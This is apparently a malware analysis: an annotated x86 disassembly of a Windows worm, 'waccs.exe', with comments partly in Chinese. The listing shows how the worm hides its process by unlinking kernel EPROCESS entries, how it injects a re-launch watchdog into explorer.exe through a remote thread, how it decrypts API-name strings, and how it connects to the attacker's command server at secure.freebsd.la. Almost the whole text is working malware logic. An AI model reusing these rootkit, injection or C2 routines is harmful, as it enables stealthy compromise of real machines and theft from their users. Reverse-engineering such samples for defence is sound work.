004063EA  B9 48000000          MOV ECX,48                         ; 0x48 DWORDs = 0x120 bytes: the count plus the first module entry
004063EF  8DBD D4FEFFFF        LEA EDI,DWORD PTR SS:[EBP-12C]
004063F5  F3:A5                REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
004063F7  8B55 F4              MOV EDX,DWORD PTR SS:[EBP-C]
004063FA  8995 CCFEFFFF        MOV DWORD PTR SS:[EBP-134],EDX
00406400  8B85 CCFEFFFF        MOV EAX,DWORD PTR SS:[EBP-134]
00406406  50                   PUSH EAX
00406407  E8 9C0D0000          CALL waccs.004071A8                ; JMP to msvcrt.operator delete
0040640C  83C4 04              ADD ESP,4
0040640F  8B4D 08              MOV ECX,DWORD PTR SS:[EBP+8]       ; arg1: out ImageBase
00406412  8B95 E0FEFFFF        MOV EDX,DWORD PTR SS:[EBP-120]     ; entry.ImageBase (buffer offset 0xC)
00406418  8911                 MOV DWORD PTR DS:[ECX],EDX
0040641A  8B85 F2FEFFFF        MOV EAX,DWORD PTR SS:[EBP-10E]     ; entry.OffsetToFileName (WORD at buffer offset 0x1E)
00406420  25 FFFF0000          AND EAX,0FFFF
00406425  B9 00010000          MOV ECX,100
0040642A  2BC8                 SUB ECX,EAX                        ; bytes to copy = 256 - OffsetToFileName (unchecked)
0040642C  51                   PUSH ECX
0040642D  8B95 F2FEFFFF        MOV EDX,DWORD PTR SS:[EBP-10E]
00406433  81E2 FFFF0000        AND EDX,0FFFF
00406439  8D8415 F4FEFFFF      LEA EAX,DWORD PTR SS:[EBP+EDX-10C] ; &entry.FullPathName[OffsetToFileName] = bare file name
00406440  50                   PUSH EAX
00406441  8B4D 0C              MOV ECX,DWORD PTR SS:[EBP+C]       ; arg2: out file name
00406444  51                   PUSH ECX
00406445  E8 520D0000          CALL waccs.0040719C                ; JMP to msvcrt.memcpy
0040644A  83C4 0C              ADD ESP,0C
0040644D  5F                   POP EDI
0040644E  5E                   POP ESI
0040644F  8BE5                 MOV ESP,EBP
00406451  5D                   POP EBP
00406452  C2 0800              RETN 8
Hide the process from ring 3: unlink its EPROCESS from ActiveProcessLinks (DKOM, with every kernel read/write going through ZwSystemDebugControl):
00406455  55                   PUSH EBP
00406456  8BEC                 MOV EBP,ESP
00406458  83EC 1C              SUB ESP,1C
0040645B  894D E4              MOV DWORD PTR SS:[EBP-1C],ECX      ; this
0040645E  8B45 E4              MOV EAX,DWORD PTR SS:[EBP-1C]
00406461  8B48 04              MOV ECX,DWORD PTR DS:[EAX+4]       ; this->SystemEprocess
00406464  894D F4              MOV DWORD PTR SS:[EBP-C],ECX       ; cur = System
00406467  8B55 E4              MOV EDX,DWORD PTR SS:[EBP-1C]
0040646A  C742 08 8800000>     MOV DWORD PTR DS:[EDX+8],88        ; this->offLinks = 0x88 = EPROCESS.ActiveProcessLinks on Windows XP
00406471  8B45 E4              MOV EAX,DWORD PTR SS:[EBP-1C]
00406474  C740 0C 8400000>     MOV DWORD PTR DS:[EAX+C],84        ; this->offPid = 0x84 = EPROCESS.UniqueProcessId on Windows XP (hence the 5.1 gate in the caller)
0040647B  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
0040647E  8B55 F4              MOV EDX,DWORD PTR SS:[EBP-C]
00406481  0351 08              ADD EDX,DWORD PTR DS:[ECX+8]
00406484  52                   PUSH EDX                           ; &System.ActiveProcessLinks.Flink
00406485  8B45 E4              MOV EAX,DWORD PTR SS:[EBP-1C]
00406488  8B08                 MOV ECX,DWORD PTR DS:[EAX]
0040648A  E8 49F9FFFF          CALL waccs.00405DD8                ; read DWORD of kernel memory (ZwSystemDebugControl)
0040648F  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
00406492  2B41 08              SUB EAX,DWORD PTR DS:[ECX+8]       ; Flink - 0x88 = EPROCESS of the next process
00406495  8945 F8              MOV DWORD PTR SS:[EBP-8],EAX       ; [EBP-8] = first process after System (snapshotted once, reused at the end)
00406498  8B55 E4              MOV EDX,DWORD PTR SS:[EBP-1C]
0040649B  8B45 F8              MOV EAX,DWORD PTR SS:[EBP-8]
0040649E  0342 08              ADD EAX,DWORD PTR DS:[EDX+8]
004064A1  50                   PUSH EAX
004064A2  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
004064A5  8B09                 MOV ECX,DWORD PTR DS:[ECX]
004064A7  E8 2CF9FFFF          CALL waccs.00405DD8                ; read DWORD of kernel memory
004064AC  8B55 E4              MOV EDX,DWORD PTR SS:[EBP-1C]
004064AF  2B42 08              SUB EAX,DWORD PTR DS:[EDX+8]
004064B2  8945 FC              MOV DWORD PTR SS:[EBP-4],EAX       ; [EBP-4] = second process after System (snapshotted once, reused at the end)
004064B5  8B45 F4              MOV EAX,DWORD PTR SS:[EBP-C]
004064B8  8945 F0              MOV DWORD PTR SS:[EBP-10],EAX      ; start = System (loop terminator)
004064BB  8B4D F4              MOV ECX,DWORD PTR SS:[EBP-C]       ; loop head
004064BE  894D E8              MOV DWORD PTR SS:[EBP-18],ECX      ; prev = cur
004064C1  8B55 E4              MOV EDX,DWORD PTR SS:[EBP-1C]
004064C4  8B45 F4              MOV EAX,DWORD PTR SS:[EBP-C]
004064C7  0342 08              ADD EAX,DWORD PTR DS:[EDX+8]
004064CA  50                   PUSH EAX                           ; &cur.ActiveProcessLinks.Flink
004064CB  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
004064CE  8B09                 MOV ECX,DWORD PTR DS:[ECX]
004064D0  E8 03F9FFFF          CALL waccs.00405DD8                ; read DWORD of kernel memory
004064D5  8B55 E4              MOV EDX,DWORD PTR SS:[EBP-1C]
004064D8  2B42 08              SUB EAX,DWORD PTR DS:[EDX+8]
004064DB  8945 F4              MOV DWORD PTR SS:[EBP-C],EAX       ; cur = next EPROCESS
004064DE  8B45 E4              MOV EAX,DWORD PTR SS:[EBP-1C]
004064E1  8B4D F4              MOV ECX,DWORD PTR SS:[EBP-C]
004064E4  0348 08              ADD ECX,DWORD PTR DS:[EAX+8]
004064E7  51                   PUSH ECX
004064E8  8B55 E4              MOV EDX,DWORD PTR SS:[EBP-1C]
004064EB  8B0A                 MOV ECX,DWORD PTR DS:[EDX]
004064ED  E8 E6F8FFFF          CALL waccs.00405DD8                ; read DWORD of kernel memory
004064F2  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
004064F5  2B41 08              SUB EAX,DWORD PTR DS:[ECX+8]
004064F8  8945 EC              MOV DWORD PTR SS:[EBP-14],EAX      ; next = process after cur
004064FB  8B55 E4              MOV EDX,DWORD PTR SS:[EBP-1C]
004064FE  8B45 F4              MOV EAX,DWORD PTR SS:[EBP-C]
00406501  0342 0C              ADD EAX,DWORD PTR DS:[EDX+C]
00406504  50                   PUSH EAX                           ; &cur.UniqueProcessId
00406505  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
00406508  8B09                 MOV ECX,DWORD PTR DS:[ECX]
0040650A  E8 C9F8FFFF          CALL waccs.00405DD8                ; read DWORD of kernel memory: cur's PID
0040650F  3B45 08              CMP EAX,DWORD PTR SS:[EBP+8]       ; == our own PID?
00406512  0F85 82000000        JNZ waccs.0040659A                 ; no: advance
00406518  8B55 E4              MOV EDX,DWORD PTR SS:[EBP-1C]
0040651B  8B45 EC              MOV EAX,DWORD PTR SS:[EBP-14]
0040651E  0342 08              ADD EAX,DWORD PTR DS:[EDX+8]
00406521  50                   PUSH EAX                           ; value = &next.ActiveProcessLinks
00406522  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
00406525  8B55 E8              MOV EDX,DWORD PTR SS:[EBP-18]
00406528  0351 08              ADD EDX,DWORD PTR DS:[ECX+8]
0040652B  52                   PUSH EDX                           ; address = &prev.ActiveProcessLinks.Flink
0040652C  8B45 E4              MOV EAX,DWORD PTR SS:[EBP-1C]
0040652F  8B08                 MOV ECX,DWORD PTR DS:[EAX]
00406531  E8 C6F8FFFF          CALL waccs.00405DFC                ; write DWORD of kernel memory (ZwSystemDebugControl): prev.Flink = &next.Links
00406536  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
00406539  8B55 E8              MOV EDX,DWORD PTR SS:[EBP-18]
0040653C  0351 08              ADD EDX,DWORD PTR DS:[ECX+8]
0040653F  52                   PUSH EDX                           ; value = &prev.ActiveProcessLinks
00406540  8B45 E4              MOV EAX,DWORD PTR SS:[EBP-1C]
00406543  8B48 08              MOV ECX,DWORD PTR DS:[EAX+8]
00406546  8B55 EC              MOV EDX,DWORD PTR SS:[EBP-14]
00406549  8D440A 04            LEA EAX,DWORD PTR DS:[EDX+ECX+4]
0040654D  50                   PUSH EAX                           ; address = &next.ActiveProcessLinks.Blink
0040654E  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
00406551  8B09                 MOV ECX,DWORD PTR DS:[ECX]
00406553  E8 A4F8FFFF          CALL waccs.00405DFC                ; write: next.Blink = &prev.Links. Our EPROCESS is now out of the list.
00406558  8B55 E4              MOV EDX,DWORD PTR SS:[EBP-1C]
0040655B  8B45 FC              MOV EAX,DWORD PTR SS:[EBP-4]
0040655E  0342 08              ADD EAX,DWORD PTR DS:[EDX+8]
00406561  50                   PUSH EAX                           ; value = &[EBP-4].ActiveProcessLinks
00406562  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
00406565  8B55 F4              MOV EDX,DWORD PTR SS:[EBP-C]
00406568  0351 08              ADD EDX,DWORD PTR DS:[ECX+8]
0040656B  52                   PUSH EDX                           ; address = &cur.ActiveProcessLinks.Flink
0040656C  8B45 E4              MOV EAX,DWORD PTR SS:[EBP-1C]
0040656F  8B08                 MOV ECX,DWORD PTR DS:[EAX]
00406571  E8 86F8FFFF          CALL waccs.00405DFC                ; write: our Flink -> the process snapshotted in [EBP-4]
00406576  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
00406579  8B55 F8              MOV EDX,DWORD PTR SS:[EBP-8]
0040657C  0351 08              ADD EDX,DWORD PTR DS:[ECX+8]
0040657F  52                   PUSH EDX                           ; value = &[EBP-8].ActiveProcessLinks
00406580  8B45 E4              MOV EAX,DWORD PTR SS:[EBP-1C]
00406583  8B48 08              MOV ECX,DWORD PTR DS:[EAX+8]
00406586  8B55 F4              MOV EDX,DWORD PTR SS:[EBP-C]
00406589  8D440A 04            LEA EAX,DWORD PTR DS:[EDX+ECX+4]
0040658D  50                   PUSH EAX                           ; address = &cur.ActiveProcessLinks.Blink
0040658E  8B4D E4              MOV ECX,DWORD PTR SS:[EBP-1C]
00406591  8B09                 MOV ECX,DWORD PTR DS:[ECX]
00406593  E8 64F8FFFF          CALL waccs.00405DFC                ; write: our Blink -> the process snapshotted in [EBP-8]. The orphaned entry keeps plausible list pointers, but they are stale snapshots taken before the walk.
00406598  EB 0C                JMP SHORT waccs.004065A6
0040659A  8B55 F0              MOV EDX,DWORD PTR SS:[EBP-10]
0040659D  3B55 F4              CMP EDX,DWORD PTR SS:[EBP-C]       ; back at System?
004065A0  ^ 0F85 15FFFFFF      JNZ waccs.004064BB                 ; no: next process
004065A6  8BE5                 MOV ESP,EBP
004065A8  5D                   POP EBP
004065A9  C2 0400              RETN 4
Inject a watchdog stub into the desktop shell "explorer.exe" and run it as a remote thread (the stub is handed a block of resolved API pointers, the worm's own path and the mutex name; CreateMutexA/GetLastError/Sleep/WinExec are what it needs to poll for the worm and re-launch it):
00405510  55                   PUSH EBP
00405511  8BEC                 MOV EBP,ESP
00405513  81EC FC020000        SUB ESP,2FC
00405519  57                   PUSH EDI
0040551A  B8 D993A38B          MOV EAX,8BA393D9
0040551F  50                   PUSH EAX
00405520  8D8D 6CFDFFFF        LEA ECX,DWORD PTR SS:[EBP-294]
00405526  E8 D5030000          CALL waccs.00405900                ; decrypt stack string -> "kernel32.dll"
0040552B  50                   PUSH EAX                           ; /pModule = "kernel32.dll"
0040552C  FF15 9C804000        CALL DWORD PTR DS:[40809C]         ; kernel32.GetModuleHandleA
00405532  8985 7CFDFFFF        MOV DWORD PTR SS:[EBP-284],EAX
00405538  8D8D 6CFDFFFF        LEA ECX,DWORD PTR SS:[EBP-294]
0040553E  E8 FD020000          CALL waccs.00405840                ; wipe the decrypted string buffer.
00405543  B9 C2A545F2          MOV ECX,F245A5C2
00405548  51                   PUSH ECX
00405549  8D8D 60FDFFFF        LEA ECX,DWORD PTR SS:[EBP-2A0]
0040554F  E8 2C040000          CALL waccs.00405980                ; decrypt stack string -> "CloseHandle"
00405554  50                   PUSH EAX                           ; /ProcNameOrOrdinal = "CloseHandle"
00405555  8B95 7CFDFFFF        MOV EDX,DWORD PTR SS:[EBP-284]
0040555B  52                   PUSH EDX                           ; |hModule = 7C800000 (kernel32)
0040555C  FF15 44804000        CALL DWORD PTR DS:[408044]         ; kernel32.GetProcAddress
00405562  8985 80FDFFFF        MOV DWORD PTR SS:[EBP-280],EAX     ; start of the parameter block for the stub (kernel32 sits at the same base in explorer.exe, so the pointers stay valid there)
00405568  8D8D 60FDFFFF        LEA ECX,DWORD PTR SS:[EBP-2A0]
0040556E  E8 9D020000          CALL waccs.00405810                ; wipe the decrypted string buffer.
00405573 68 22F85E60 PUSH 605EF822 00405578 8D8D 54FDFFFF LEA ECX,DWORD PTR SS:[EBP-2AC] 0040557E E8 7D040000 CALL waccs.00405A00 ; ASCII "CreateFileA" 00405583 50 PUSH EAX ; /ProcNameOrOrdinal = "CreateFileA" 00405584 8B85 7CFDFFFF MOV EAX,DWORD PTR SS:[EBP-284] 0040558A 50 PUSH EAX ; |hModule = 7C800000 (kernel32) 0040558B FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 00405591 8985 84FDFFFF MOV DWORD PTR SS:[EBP-27C],EAX 00405597 8D8D 54FDFFFF LEA ECX,DWORD PTR SS:[EBP-2AC] 0040559D E8 6E020000 CALL waccs.00405810 ; 清除内存数据. 004055A2 68 2C150011 PUSH 1100152C 004055A7 8D8D 44FDFFFF LEA ECX,DWORD PTR SS:[EBP-2BC] 004055AD E8 CE040000 CALL waccs.00405A80 ; ASCII "CreateMutexA" 004055B2 50 PUSH EAX ; /ProcNameOrOrdinal = "CreateMutexA" 004055B3 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 004055B9 51 PUSH ECX ; |hModule = 7C800000 (kernel32) 004055BA FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 004055C0 8985 88FDFFFF MOV DWORD PTR SS:[EBP-278],EAX 004055C6 8D8D 44FDFFFF LEA ECX,DWORD PTR SS:[EBP-2BC] 004055CC E8 6F020000 CALL waccs.00405840 ; 清除内存数据. 004055D1 BA EE438A84 MOV EDX,848A43EE 004055D6 52 PUSH EDX 004055D7 8D8D 34FDFFFF LEA ECX,DWORD PTR SS:[EBP-2CC] 004055DD E8 1E050000 CALL waccs.00405B00 ; ASCII "GetLastError" 004055E2 50 PUSH EAX ; /ProcNameOrOrdinal = "GetLastError" 004055E3 8B85 7CFDFFFF MOV EAX,DWORD PTR SS:[EBP-284] 004055E9 50 PUSH EAX ; |hModule = 7C800000 (kernel32) 004055EA FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 004055F0 8985 8CFDFFFF MOV DWORD PTR SS:[EBP-274],EAX 004055F6 8D8D 34FDFFFF LEA ECX,DWORD PTR SS:[EBP-2CC] 004055FC E8 3F020000 CALL waccs.00405840 ; 清除内存数据. 
00405601 68 EF642F4B PUSH 4B2F64EF 00405606 8D8D 24FDFFFF LEA ECX,DWORD PTR SS:[EBP-2DC] 0040560C E8 6F050000 CALL waccs.00405B80 ; ASCII "ReleaseMutex" 00405611 50 PUSH EAX ; /ProcNameOrOrdinal = "ReleaseMutex" 00405612 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 00405618 51 PUSH ECX ; |hModule = 7C800000 (kernel32) 00405619 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040561F 8985 90FDFFFF MOV DWORD PTR SS:[EBP-270],EAX 00405625 8D8D 24FDFFFF LEA ECX,DWORD PTR SS:[EBP-2DC] 0040562B E8 10020000 CALL waccs.00405840 ; 清除内存数据. 00405630 68 C0DE9D2B PUSH 2B9DDEC0 00405635 8D8D 1CFDFFFF LEA ECX,DWORD PTR SS:[EBP-2E4] 0040563B E8 C0050000 CALL waccs.00405C00 ; ASCII "Sleep" 00405640 50 PUSH EAX ; /ProcNameOrOrdinal = "Sleep" 00405641 8B95 7CFDFFFF MOV EDX,DWORD PTR SS:[EBP-284] 00405647 52 PUSH EDX ; |hModule = 7C800000 (kernel32) 00405648 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040564E 8985 94FDFFFF MOV DWORD PTR SS:[EBP-26C],EAX 00405654 8D8D 1CFDFFFF LEA ECX,DWORD PTR SS:[EBP-2E4] 0040565A E8 11020000 CALL waccs.00405870 ; 清除内存数据. 0040565F B8 193BE6A9 MOV EAX,A9E63B19 00405664 50 PUSH EAX 00405665 8D8D 14FDFFFF LEA ECX,DWORD PTR SS:[EBP-2EC] 0040566B E8 10060000 CALL waccs.00405C80 ; ASCII "WinExec" 00405670 50 PUSH EAX ; /ProcNameOrOrdinal = "WinExec" 00405671 8B8D 7CFDFFFF MOV ECX,DWORD PTR SS:[EBP-284] 00405677 51 PUSH ECX ; |hModule = 7C800000 (kernel32) 00405678 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress 0040567E 8985 98FDFFFF MOV DWORD PTR SS:[EBP-268],EAX 00405684 8D8D 14FDFFFF LEA ECX,DWORD PTR SS:[EBP-2EC] 0040568A E8 11020000 CALL waccs.004058A0 ; 清除内存数据. 
0040568F B9 51000000 MOV ECX,51 00405694 33C0 XOR EAX,EAX 00405696 8DBD 9CFDFFFF LEA EDI,DWORD PTR SS:[EBP-264] 0040569C F3:AB REP STOS DWORD PTR ES:[EDI] 0040569E 8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118] 004056A4 52 PUSH EDX 004056A5 6A 00 PUSH 0 004056A7 B8 E4CE3489 MOV EAX,8934CEE4 004056AC 50 PUSH EAX 004056AD 8D8D 04FDFFFF LEA ECX,DWORD PTR SS:[EBP-2FC] 004056B3 E8 48060000 CALL waccs.00405D00 ; ASCII "Shell_TrayWnd" 004056B8 50 PUSH EAX ; ASCII "Shell_TrayWnd" 004056B9 FF15 88814000 CALL DWORD PTR DS:[408188] ; USER32.FindWindowA(寻找"Shell_TrayWnd"窗口,该窗口进程名为“explorer.exe”,是系统桌面程序). 004056BF 50 PUSH EAX 004056C0 FF15 A8814000 CALL DWORD PTR DS:[4081A8] ; USER32.GetWindowThreadProcessId(获取进程ID). 004056C6 8D8D 04FDFFFF LEA ECX,DWORD PTR SS:[EBP-2FC] 004056CC E8 FF010000 CALL waccs.004058D0 ; 清除内存数据. 004056D1 8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118] 004056D7 51 PUSH ECX 004056D8 6A 00 PUSH 0 004056DA 68 FF0F1F00 PUSH 1F0FFF ; Access = PROCESS_ALL_ACCESS 004056DF FF15 48804000 CALL DWORD PTR DS:[408048] ; kernel32.OpenProcess(打开系统桌面程序“explorer.exe”进程). 004056E5 8985 E4FEFFFF MOV DWORD PTR SS:[EBP-11C],EAX 004056EB 83BD E4FEFFFF 0>CMP DWORD PTR SS:[EBP-11C],0 004056F2 75 07 JNZ SHORT waccs.004056FB 004056F4 33C0 XOR EAX,EAX 004056F6 E9 10010000 JMP waccs.0040580B ; 如果打开系统桌面程序“explorer.exe”进程失败则退出(返回)该函数. 004056FB 68 03010000 PUSH 103 00405700 8D95 F4FEFFFF LEA EDX,DWORD PTR SS:[EBP-10C] 00405706 52 PUSH EDX 00405707 6A 00 PUSH 0 00405709 FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA(获取程序自身路径名). 0040570F 68 03010000 PUSH 103 ; /maxlen = 103 (259.) 00405714 8D85 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP-10C] 0040571A 50 PUSH EAX ; |src = "C:\WINDOWS\system32\waccs.exe" 0040571B 8D8D 9CFDFFFF LEA ECX,DWORD PTR SS:[EBP-264] 00405721 51 PUSH ECX ; |dest = 0012F56C 00405722 E8 75190000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00405727 83C4 0C ADD ESP,0C 0040572A 6A 3F PUSH 3F ; /maxlen = 3F (63.) 
0040572C 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 0040572F 52 PUSH EDX ; |src = "t3x0" 00405730 8D85 A0FEFFFF LEA EAX,DWORD PTR SS:[EBP-160] 00405736 50 PUSH EAX ; |dest = 0012F670 00405737 E8 60190000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 0040573C 83C4 0C ADD ESP,0C 0040573F 6A 04 PUSH 4 00405741 68 00100000 PUSH 1000 00405746 68 60010000 PUSH 160 0040574B 6A 00 PUSH 0 0040574D 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] 00405753 51 PUSH ECX 00405754 FF15 4C804000 CALL DWORD PTR DS:[40804C] ; kernel32.VirtualAllocEx(在目标进程“explorer.exe”中申请内存). 0040575A 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 0040575D 8D95 F0FEFFFF LEA EDX,DWORD PTR SS:[EBP-110] 00405763 52 PUSH EDX ; /pBytesWritten = 0012F6C0 00405764 68 60010000 PUSH 160 ; |BytesToWrite = 160 (352.) 00405769 8D85 80FDFFFF LEA EAX,DWORD PTR SS:[EBP-280] 0040576F 50 PUSH EAX ; |Buffer = 0012F550 00405770 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 00405773 51 PUSH ECX ; |Address = 1460000 00405774 8B95 E4FEFFFF MOV EDX,DWORD PTR SS:[EBP-11C] 0040577A 52 PUSH EDX ; |hProcess = 000000A4 (window) 0040577B FF15 50804000 CALL DWORD PTR DS:[408050] ; kernel32.WriteProcessMemory(向目标进程“explorer.exe”内存空间中注入代码[数据段],代码数据在地址"0012F550"处,大小为0x160 "352."). 00405781 B8 0B554000 MOV EAX,waccs.0040550B 00405786 2D 60544000 SUB EAX,waccs.00405460 0040578B 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 0040578E 6A 40 PUSH 40 00405790 68 00100000 PUSH 1000 00405795 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8] 00405798 51 PUSH ECX 00405799 6A 00 PUSH 0 0040579B 8B95 E4FEFFFF MOV EDX,DWORD PTR SS:[EBP-11C] 004057A1 52 PUSH EDX 004057A2 FF15 4C804000 CALL DWORD PTR DS:[40804C] ; kernel32.VirtualAllocEx(在目标进程“explorer.exe”中申请内存). 004057A8 8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX 004057AE 8D85 F0FEFFFF LEA EAX,DWORD PTR SS:[EBP-110] 004057B4 50 PUSH EAX ; /pBytesWritten = 0012F6C0 004057B5 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8] 004057B8 51 PUSH ECX ; |BytesToWrite = AB (171.) 
004057B9 68 60544000 PUSH waccs.00405460 ; |Buffer = waccs.00405460 004057BE 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 004057C4 52 PUSH EDX ; |Address = 1A50000 004057C5 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] 004057CB 50 PUSH EAX ; |hProcess = 000000A4 (window) 004057CC FF15 50804000 CALL DWORD PTR DS:[408050] ; kernel32.WriteProcessMemory(向目标进程“explorer.exe”内存空间中注入代码[代码段],代码数据在地址"00405460"处,大小为0xAB "171."). 004057D2 6A 00 PUSH 0 004057D4 6A 00 PUSH 0 004057D6 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 004057D9 51 PUSH ECX 004057DA 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 004057E0 52 PUSH EDX 004057E1 6A 00 PUSH 0 004057E3 6A 00 PUSH 0 004057E5 8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C] 004057EB 50 PUSH EAX 004057EC FF15 54804000 CALL DWORD PTR DS:[408054] ; kernel32.CreateRemoteThread(创建远程线程). 004057F2 8985 ECFEFFFF MOV DWORD PTR SS:[EBP-114],EAX 004057F8 8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C] 004057FE 51 PUSH ECX 004057FF FF15 58804000 CALL DWORD PTR DS:[408058] ; kernel32.CloseHandle(关闭进程句柄). 00405805 8B85 ECFEFFFF MOV EAX,DWORD PTR SS:[EBP-114] 0040580B 5F POP EDI 0040580C 8BE5 MOV ESP,EBP 0040580E 5D POP EBP 0040580F C3 RETN ; 返回. 连接骇客远程服务器"http://www.secure.freebsd.la": 004010AA 55 PUSH EBP 004010AB 8BEC MOV EBP,ESP 004010AD 83EC 24 SUB ESP,24 004010B0 6A 06 PUSH 6 ; /Family = AF_INET 004010B2 6A 01 PUSH 1 ; |Type = SOCK_STREAM 004010B4 6A 02 PUSH 2 ; |Family = AF_INET 004010B6 FF15 E0814000 CALL DWORD PTR DS:[4081E0] ; WS2_32.socket 004010BC 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 004010BF 8901 MOV DWORD PTR DS:[ECX],EAX 004010C1 6A 00 PUSH 0 ; /ShowState = SW_HIDE 004010C3 68 7833E110 PUSH 10E13378 004010C8 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24] 004010CB E8 A6100000 CALL waccs.00402176 ; ASCII "ipconfig /flushdns" 004010D0 50 PUSH EAX ; |CmdLine = "ipconfig /flushdns"(命令). 004010D1 FF15 5C804000 CALL DWORD PTR DS:[40805C] ; kernel32.WinExec(执行DOS控制台命令). 
004010D7  8D4D DC           LEA ECX,DWORD PTR SS:[EBP-24]
004010DA  E8 B70D0000       CALL waccs.00401E96                       ; Clear memory data.
004010DF  6A 10             PUSH 10
004010E1  6A 00             PUSH 0
004010E3  8D45 F0           LEA EAX,DWORD PTR SS:[EBP-10]
004010E6  50                PUSH EAX
004010E7  E8 4E5F0000       CALL waccs.0040703A                       ; JMP to msvcrt.memset
004010EC  83C4 0C           ADD ESP,0C
004010EF  66:C745 F0 0200   MOV WORD PTR SS:[EBP-10],2
004010F5  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
004010F8  66:8B80 8400000>  MOV AX,WORD PTR DS:[EAX+84]
004010FF  50                PUSH EAX                                  ; /NetShort = 122646
00401100  FF15 D0814000     CALL DWORD PTR DS:[4081D0]                ; WS2_32.ntohs (returns the value in host byte order).
00401106  66:8945 F2        MOV WORD PTR SS:[EBP-E],AX
0040110A  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
0040110D  83C0 04           ADD EAX,4
00401110  50                PUSH EAX
00401111  E8 252B0000       CALL waccs.00403C3B                       ; Resolve the host name to an address.
00401116  59                POP ECX
00401117  8945 F4           MOV DWORD PTR SS:[EBP-C],EAX
0040111A  6A 10             PUSH 10
0040111C  8D45 F0           LEA EAX,DWORD PTR SS:[EBP-10]
0040111F  50                PUSH EAX
00401120  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401123  FF30              PUSH DWORD PTR DS:[EAX]                   ; /(Socket = B4, pSockAddr = 0012F7C0, AddrLen = 10 (16.))
00401125  FF15 CC814000     CALL DWORD PTR DS:[4081CC]                ; WS2_32.connect
0040112B  83F8 FF           CMP EAX,-1
0040112E  75 0F             JNZ SHORT waccs.0040113F                  ; Check whether the network connection succeeded.
00401130  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401133  FF30              PUSH DWORD PTR DS:[EAX]
00401135  FF15 C8814000     CALL DWORD PTR DS:[4081C8]                ; WS2_32.closesocket (if connect failed, close the socket).
0040113B  32C0              XOR AL,AL
0040113D  EB 02             JMP SHORT waccs.00401141
0040113F  B0 01             MOV AL,1
00401141  C9                LEAVE
00401142  C3                RETN                                      ; Return.
Resolve the host name to an address:

00403C3B  55                PUSH EBP
00403C3C  8BEC              MOV EBP,ESP
00403C3E  51                PUSH ECX
00403C3F  51                PUSH ECX
00403C40  FF75 08           PUSH DWORD PTR SS:[EBP+8]                 ; ASCII "secure.freebsd.la"
00403C43  FF15 D4814000     CALL DWORD PTR DS:[4081D4]                ; WS2_32.inet_addr
00403C49  8945 FC           MOV DWORD PTR SS:[EBP-4],EAX
00403C4C  837D FC FF        CMP DWORD PTR SS:[EBP-4],-1
00403C50  75 24             JNZ SHORT waccs.00403C76
00403C52  FF75 08           PUSH DWORD PTR SS:[EBP+8]                 ; /Name = "secure.freebsd.la"
00403C55  FF15 D8814000     CALL DWORD PTR DS:[4081D8]                ; WS2_32.gethostbyname (resolve the host name to an address).
00403C5B  8945 F8           MOV DWORD PTR SS:[EBP-8],EAX
00403C5E  837D F8 00        CMP DWORD PTR SS:[EBP-8],0
00403C62  75 05             JNZ SHORT waccs.00403C69                  ; Check whether resolution succeeded.
00403C64  83C8 FF           OR EAX,FFFFFFFF
00403C67  EB 10             JMP SHORT waccs.00403C79
00403C69  8B45 F8           MOV EAX,DWORD PTR SS:[EBP-8]
00403C6C  8B40 0C           MOV EAX,DWORD PTR DS:[EAX+C]
00403C6F  8B00              MOV EAX,DWORD PTR DS:[EAX]
00403C71  8B00              MOV EAX,DWORD PTR DS:[EAX]
00403C73  8945 FC           MOV DWORD PTR SS:[EBP-4],EAX
00403C76  8B45 FC           MOV EAX,DWORD PTR SS:[EBP-4]
00403C79  C9                LEAVE
00403C7A  C3                RETN                                      ; Return.

Check whether certain messaging tools are running on the system (they may be used to post advertisements, to self-propagate, and to steal account and password information), then build and send packets (several packet formats / covert communication with the attacker's remote server):

00401143  55                PUSH EBP
